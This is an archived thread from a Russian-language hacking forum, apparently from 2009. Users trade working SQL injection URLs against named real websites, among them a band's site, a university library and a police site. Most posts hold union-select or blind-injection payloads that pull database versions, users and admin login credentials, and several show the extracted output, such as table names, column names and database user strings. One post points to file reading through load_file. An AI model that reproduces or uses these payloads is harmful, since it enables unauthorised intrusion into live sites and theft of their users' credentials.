ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11201  
Старый 10.11.2009, 13:01
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

http://www.let-online.co.uk/news_view.php?id=-4+union+select+1,group_concat(0x0b,column_name),3, 4+from+information_schema.columns+where+table_name =0x427573546f7055736572
BusTopUser::ID:UserName:UserPass
http://www.let-online.co.uk/news_view.php?id=-4+union+select+1,group_concat(0x0b,ID,0x3a,UserNam e,0x3a,UserPass),3,4+from+BusTopUser
MySQL 5.0.45
admin panel: http://www.let-online.co.uk/admin/login.php
вывод ошибок отключен
 
Ответить с цитированием

  #11202  
Старый 10.11.2009, 14:10
Dyxxx
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
Провел на форуме:
879928

Репутация: 438
По умолчанию

Coldplay.com pr7
Официальный сайт поп/рок группы coldplay.
Код:
http://www.coldplay.com/newsdetail.php?id=547'+union+select+null,null,null,concat_ws(char(32,124,32),version(),user(),database(),@@version_compile_os),null,null,null,null,null+--+
version | user | database | os
4.1.22-log | coldplay_user@vlonj205w1.emihosting.com | coldplay | redhat-linux-gnu
 
Ответить с цитированием

  #11203  
Старый 10.11.2009, 17:23
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

дуду еду
Цитата:
http://library.uncc.edu/knowledgebase/question.php?q=3+order+by+9/*&oquery=Borrow&dept=library
load_file ;-)
 
Ответить с цитированием

  #11204  
Старый 10.11.2009, 17:31
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

http://www.weblaube.de/support/download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ ws(0x3a,version()),0,0,0,0+from+idesk_user--
version - 5.0.51a-24+lenny2
database - web5@localhost
user - usr_web5_2
os - debian-linux-gnu

users
http://www.weblaube.de/support/download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ ws(0x3a,user_name,password,last_login),0,0,0,0+fro m+idesk_user--
 
Ответить с цитированием

  #11205  
Старый 10.11.2009, 18:16
pelligrim
Познающий
Регистрация: 26.04.2008
Сообщений: 31
Провел на форуме:
31474

Репутация: 53
По умолчанию

Код:
http://rassvet.websib.ru/portret_sec.htm?cod=1+and+substring(version(),1,1)=4
version: 4.1.20
database: cinema
user: shine@localhost


Код:
http://www.knyazev.ru/index.php?mm=7&id=-2+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4--
4.1.22-standard-log:balabol_knyazev:balabol_knyazev@web03.lan
Есть таблицы admins, clients


Код:
http://www.tutpricol.ru/message.php?id=9999+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7--
4.1.25-log:tutpric5_tutpricol:tutpric5_root@localhost
есть таблица users
 
Ответить с цитированием

  #11206  
Старый 10.11.2009, 19:17
maestra_toys
Banned
Регистрация: 08.11.2009
Сообщений: 26
Провел на форуме:
116719

Репутация: 15
Отправить сообщение для maestra_toys с помощью ICQ
По умолчанию

Код:
http://www.fc-anji.ru/news.php?id=1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6
opendag@localhost:wwwopendagru:4.1.25-log


Код:
http://www.ovidiopol.com/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6%20--
root@localhostvd:5.0.27

Код:
http://www.patrulrinpoche.ru/news.php?id=-72+union+select+concat_ws(0x3a,user(),database(),version())
patrul_ru@localhostatrul_ru:5.0.27-community-nt

Код:
http://www.caen.it/nuclear/news.php?id=-160+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9%20--
mynews@localhost:CaenNews:5.0.77

Код:
http://www.phenomental.ru/news.php?id=-4+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4%20--
phenomenta@localhosthenomenta_sql:4.1.22
 
Ответить с цитированием

  #11207  
Старый 10.11.2009, 20:27
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909

Репутация: 308
По умолчанию

Код:
http://www.erf-nimes.org/page_1.php?ID=-101+and+1=0+union+select+1,2,concat(nomutilisateur,0x3a,motpasse),4+from+utilisateur--
Код:
http://www.greetingcard.org/about.php?ID=-1+union+select+1,concat_ws(0x3a,userUserName,userPassword,userID),3,4,5,6,7,8,9,10+from+users--
Код:
http://www.exhaus.de/index.php?siteID=2499+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8--
Код:
http://www.eamesoffice.com/vintage/spotting_detail.php?id=-92+and+1=0+union+select+1,2,3,4,5,6,7,8,concat%28username,0x3a,userpasswo 
rd%29,10,11,12,13+from+users--
Код:
http://www.tasfrance.com/view_newsletter.php?id=-12+and+1=0+union+select+1,2,3,4,5,6,concat(clinum,0x3a,password),8+from+password--
 
Ответить с цитированием

  #11208  
Старый 10.11.2009, 21:48
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

portacafe.ru

Blind SQL -
Код:
http://portacafe.ru/index.html?id=1/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)j)k)l)/**/AND/**/1=1
version - 5.0.51a-24+lenny2-log
 
Ответить с цитированием

  #11209  
Старый 10.11.2009, 21:58
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

=))
Цитата:
revip:
star-force.ru
star-force.com
Цитата:
http://www.onlinesecurity-on.com/protect.phtml?c=55+union+select+1,2,3,database(),u ser(),6,7,8,9,10,11,12,version(),14,15,16,17+limit +1,1/*
Цитата:
onlinesecurity@localhost
onlinesecurity
5.0.45
 
Ответить с цитированием

  #11210  
Старый 10.11.2009, 22:03
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.shaman-magazine.com/fhs/template_e-magazine.php?ID=-125+union+select+1,2,3,4,5,6,7,8,9,10,11+/*+&bereich=1

http://ashleybakery.com/features.php?ID=-1+union+select+1,2,3,4+--+

http://gorabazarici.org/news.php?id=-14+union+select+1,2,concat_ws(0x3a3a,admin_id,admi n_username,admin_password),4,5+from+admin_master+--+

http://photo-usa.ru/magazine.php?action=goodsdescription&target=-937+union+select+1,2,3,4,5,6,7,8,9,10+/*+

http://www.soulsista.nl/pages/magazine.php?onderwerp=diggindeep&id=-63+union+select+1,2,3,4,5,6,7,8,9+from+admin+/*+&lastlink=magazine

http://www.ilfaroonline.it/magazine.php?id=-487+union+select+1,2,pass,4,5,6+from+admin+--+

http://www.police.sec.ps/magazine.php?id=-1+union+select+1,password,user,4,5,6,7+from+_user+--+

http://zy.excite.co.jp/p/magazine.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17+/*+
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ